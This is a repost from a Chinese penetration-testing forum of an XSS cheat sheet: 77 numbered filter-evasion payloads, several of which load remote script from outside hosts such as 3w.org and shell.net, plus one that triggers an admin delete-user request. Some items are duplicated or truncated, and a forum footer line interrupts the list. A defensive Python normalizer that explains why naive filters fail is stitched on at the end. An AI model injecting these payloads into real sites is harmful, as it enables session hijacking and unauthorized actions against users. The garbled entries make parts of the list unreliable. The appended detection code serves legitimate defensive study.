中国网络渗透测试联盟
Title: XSS Attack Compilation
Author: admin
Posted: 2013-4-19 19:22
There doesn't seem to be much XSS material on t00ls, so I'm copying over something good I came across; maybe some of you will want to bookmark it.

(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example

<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective in China, since there is nowhere to make use of them

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) Style sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image (list style)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript

<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with a URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the HTC file must be on the same server as your XSS payload

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that

<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding

<A HREF="http://3w.org">XSS</A>

(70) Decimal (dword) IP

<A HREF="http://3232235521">XSS</A>

(71) Hex IP

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding

<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]

<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot

<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source:
http://fuzzexp.org/u/0day/?p=14
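As an added defender-side illustration (not part of the original post or the cheat sheet it copies), the Python below normalizes a URL-valued HTML attribute the way lenient browsers do before they read the scheme, so the case-folding, entity-encoding, embedded tab/newline/CR, leading-whitespace and null-byte variants from items (4), (5), (8)-(14), (17) and (19) all collapse to the same `javascript:` scheme. The samples are constructed from those items, and `naive_check` is a hypothetical substring filter included only to show what such a filter misses.

```python
import html
import re

# Lenient HTML/URL parsing drops ASCII tab, LF and CR anywhere inside a URL and
# skips leading C0 controls and spaces before the scheme; mirror that here.
_STRIP_ANYWHERE = re.compile(r"[\t\n\r]")
_LEADING_JUNK = re.compile(r"^[\x00-\x20]+")
_SCRIPT_SCHEMES = ("javascript", "vbscript")

def normalize_url_attribute(value: str) -> str:
    """Reduce an attribute value to what a browser sees when it reads the scheme."""
    # html.unescape decodes &#106; and &#x6A; and, like browsers, the forms with
    # no trailing semicolon, so the entity variants of items (5) and (8)-(10) collapse.
    decoded = html.unescape(value)
    decoded = decoded.replace("\x00", "")       # null bytes, items (17)/(18)
    decoded = _STRIP_ANYWHERE.sub("", decoded)  # tab/LF/CR, items (11)-(14)
    decoded = _LEADING_JUNK.sub("", decoded)    # leading space/meta chars, item (19)
    return decoded.lower()                      # case folding, item (4)

def is_script_url(value: str) -> bool:
    """True if a URL-valued attribute would run script in a lenient browser."""
    normalized = normalize_url_attribute(value)
    if ":" not in normalized:
        return False  # scheme-relative URLs such as //www.google.com/ have no scheme
    return normalized.split(":", 1)[0] in _SCRIPT_SCHEMES

def naive_check(value: str) -> bool:
    """Hypothetical substring filter, included only for contrast."""
    return "javascript:" in value.lower()

# Constructed samples modelled on the cheat-sheet items named above.
SAMPLES = [
    "javascript:alert('XSS')",
    "JaVaScRiPt:alert('XSS')",
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "jav&#x09;ascript:alert('XSS');",
    "jav&#x0A;ascript:alert('XSS');",
    "jav&#x0D;ascript:alert('XSS');",
    " &#14; javascript:alert('XSS');",
    "java\x00script:alert(\"XSS\")",
    "vbscript:msgbox(\"XSS\")",
    "http://3w.org/XSS/xss.js",
    "//www.google.com/",
]

def missed_by_naive_filter() -> list:
    """Samples the substring filter lets through although they still run script."""
    return [s for s in SAMPLES if is_script_url(s) and not naive_check(s)]
```

Calling `missed_by_naive_filter()` returns the six samples that a plain `javascript:` substring match passes but that still resolve to a script scheme, which is why output encoding and an allow-list of schemes after normalization, rather than blacklisting strings, is the mitigation for this whole family.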
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2